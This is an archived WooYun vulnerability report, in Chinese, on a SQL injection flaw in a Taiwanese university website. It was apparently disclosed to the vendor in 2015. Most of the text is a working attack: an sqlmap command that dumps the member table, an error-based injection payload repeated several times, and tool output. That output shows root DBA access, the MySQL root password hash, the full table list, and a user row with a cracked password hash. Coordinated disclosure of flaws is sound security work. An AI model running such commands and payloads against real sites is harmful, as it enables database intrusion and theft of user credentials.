乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-23: 细节已通知厂商并且等待厂商处理中 2015-10-24: 厂商已经确认,细节仅向厂商公开 2015-11-03: 细节向核心白帽子及相关领域专家公开 2015-11-13: 细节向普通白帽子公开 2015-11-23: 细节向实习白帽子公开 2015-12-08: 细节向公众公开
台湾金门大学某处存在SQL注射漏洞(DBA权限/root密码泄露/134个表/用户密码泄露)
sqlmap测试地址:http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb
python sqlmap.py -u "http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb" -p ids --technique=E --random-agent -D km_kmit -T km_member -C ID,member_username,member_passwd,member_email --dump
---Parameter: ids (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb---web application technology: PHP 5.6.7back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [1]:[*] 'root'@'localhost'database management system users password hashes:[*] root [1]: password hash: *063BBBCB4AFA236F83D1CDACC781DF3DDF0C4801sqlmap resumed the following injection point(s) from stored session:---Parameter: ids (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb---web application technology: PHP 5.6.7back-end DBMS: MySQL 5.0available databases [5]:[*] information_schema[*] km_kmit[*] mysql[*] performance_schema[*] testsqlmap resumed the following injection point(s) from stored session:---Parameter: ids (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb---web application technology: PHP 5.6.7back-end DBMS: MySQL 5.0Database: km_kmit[134 tables]+-----------------------------------+| km_album || km_album_category || km_article || km_article_class || km_article_custom_field || km_article_custom_item || km_article_custom_uniqidfieldlist || km_article_exchange || km_article_group || km_article_type || km_attachment || km_attachment_category || km_attachment_item || km_attachment_order || km_banner || km_banner_new || km_bexchange || km_block || km_blog || km_bookmember || km_calendar || km_calendar_content || km_checkfile || km_chief_mailbox || km_chief_mailbox_log || km_chief_mailbox_setemail || km_conference || km_conference_content || km_conference_discuss || km_conference_hotel || km_conference_news || km_conference_photo || km_conference_record || km_conference_schedule || km_conference_signup || km_conference_traffic || km_conference_travel || km_conference_visit || km_discuss || km_discuss_article || km_download || km_ecard || km_ecard_category || km_epaper || km_epaper_channel || km_epaper_order || km_evaluate || km_evaluate_basic || km_evaluate_chief || km_evaluate_content || km_evaluate_data || km_evaluate_download || km_evaluate_item || km_evaluate_link || km_faq || km_faq_category || km_file || km_file_category || km_form || km_form_1 || km_form_10 || km_form_11 || km_form_12 || km_form_13 || km_form_14 || km_form_15 || km_form_16 || km_form_17 || km_form_18 || km_form_19 || km_form_2 || km_form_3 || km_form_4 || km_form_5 || km_form_6 || km_form_7 || km_form_8 || km_form_9 || km_form_userlogin || km_formvalue || km_formvaluex || km_formx || km_frame || km_ftpuse || km_gbook || km_glossary || km_glossary_category || km_hits || km_image || km_keywordcreate || km_kmit_back || km_layout || km_layout_change || km_lecture || km_lecture_category || km_log || km_manager || km_manager_class || km_manager_group || km_manager_job || km_manager_mark || km_manager_online || km_member || km_member_group || km_modeblock || km_modefile || km_modelist || km_modestyle || km_modetext || km_module || km_module_category || km_module_distribute || km_module_frame || km_mybook || km_online || km_park || km_park_apply || km_park_centre || km_photo || km_reserve || km_reserve_member || km_rss || km_rss_unit || km_setting || km_sign_up || km_sign_up_user || km_style || km_teachermem || km_template || km_tradebook || km_webstyle || t_album || t_album_category || t_photo |+-----------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: ids (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb---web application technology: PHP 5.6.7back-end DBMS: MySQL 5.0Database: km_kmitTable: km_member[15 columns]+-------------------+--------------+| Column | Type |+-------------------+--------------+| address | varchar(255) || disabled | int(11) || ID | int(11) || login_ip | varchar(15) || login_time | int(11) || member_audit | int(11) || member_audit_code | varchar(255) || member_birthday | date || member_email | varchar(100) || member_idname | varchar(250) || member_passwd | varchar(50) || member_realname | varchar(50) || member_sex | varchar(10) || member_username | varchar(50) || phone | varchar(255) |+-------------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: ids (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb---web application technology: PHP 5.6.7back-end DBMS: MySQL 5.0Database: km_kmitTable: km_member[1 entry]+----+-----------------+-------------------------------------------+--------------+| ID | member_username | member_passwd | member_email |+----+-----------------+-------------------------------------------+--------------+| 1 | galio | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> |+----+-----------------+-------------------------------------------+--------------+
增加过滤
危害等级:高
漏洞Rank:18
确认时间:2015-10-24 16:51
感謝通報
暂无